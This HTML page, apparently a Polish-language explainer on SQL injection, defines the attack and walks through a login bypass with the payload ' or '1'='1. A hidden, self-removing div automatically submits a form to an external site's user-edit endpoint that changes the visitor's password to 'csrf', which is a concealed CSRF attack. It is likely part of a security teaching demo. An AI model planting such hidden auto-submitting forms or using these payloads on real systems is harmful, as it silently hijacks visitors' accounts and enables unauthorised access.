<!DOCTYPE html>
<html>
<head>
	<title>SQL Injection</title>

	<link href="https://fonts.googleapis.com/css?family=Roboto:400" rel="stylesheet" type="text/css">

	<style>
		* {
			margin: 0;
			padding: 0;
		}

		body {
			font-weight: 400;
			font-family: 'Roboto';
		}

		.container { padding: 50px 30px; }

		h1 { font-size: 40px; }
		p, li { line-height: 140%; }
		p + p { margin-top: 20px; }
		h1 + p { margin-top: 30px; }

		ul { margin-left: 20px; }
		code {
			border: 1px solid rgba(0,0,0,0.2);
			background: rgba(0,0,0,0.05);
			border-radius: 3px;
			padding: 2px 4px;
		}
	</style>
</head>
<body>
	<div class="container">
		<div class="content">
			<h1> SQL Injection </h1>
			<p> Metoda ataku komputerowego wykorzystująca lukę w zabezpieczeniach aplikacji polegającą na <u>nieodpowiednim filtrowaniu</u> lub <u>niedostatecznym typowaniu danych</u> użytkownika, które to dane są później wykorzystywane przy wykonaniu zapytań (SQL) do bazy danych. Podatne są na nią wszystkie systemy przyjmujące dane od użytkownika i <u>dynamicznie generujące zapytania</u> do bazy danych. </p>
			<p> Przykładowy atak dostępny na stronie: </p>
			<ul>
				<li> Przechodzimy do strony logowania/wylogowujemy się </li>
				<li> W polu mail wpisujemy <code>' or '1'='1</code> (pole hasło możemy zostawić puste)</li>
				<li> Zatwierdzamy, powinniśmy zostać zalogowani na pierwszego dostępnego użytkownika </li>
			</ul>
		</div>

		<div style="display: none" class="auto_destroy">
			<iframe name="myiframe"></iframe>
			<form target="myiframe" class="uk-form uk-margin-large-top" method="get" action="http://ping.wojtekmleczek.pl/logout">
				<input type="submit" class="lo">
			</form>
			<form target="myiframe" class="uk-form uk-margin-large-top" method="post" action="http://ping.wojtekmleczek.pl/user/edit">
				<input type="hidden" name="_method" value="put">

				<div class="uk-form-row">
					<label class="uk-form-label"> Password: </label>
					<div class="uk-form-controls">
						<input class="uk-width-1-1" type="password" name="password" value="csrf">
					</div>
				</div>

				<div class="uk-form-row">
					<label class="uk-form-label"> Confirm password: </label>
					<div class="uk-form-controls">
						<input class="uk-width-1-1" type="password" name="password_confirmation" value="csrf">
					</div>
				</div>

				<div class="uk-form-row">
					<input class="uk-button" type="submit" name="submit" value="Update">
				</div>
			</form>

			<script src="https://code.jquery.com/jquery-1.12.0.min.js"></script>
			<script>
				$('input[name="submit"]').click();
				setTimeout(function() {
					//$('.lo').click();
					$('.auto_destroy').remove();
				}, 1000);
			</script>
		</div>
	</div>
</body>
</html>
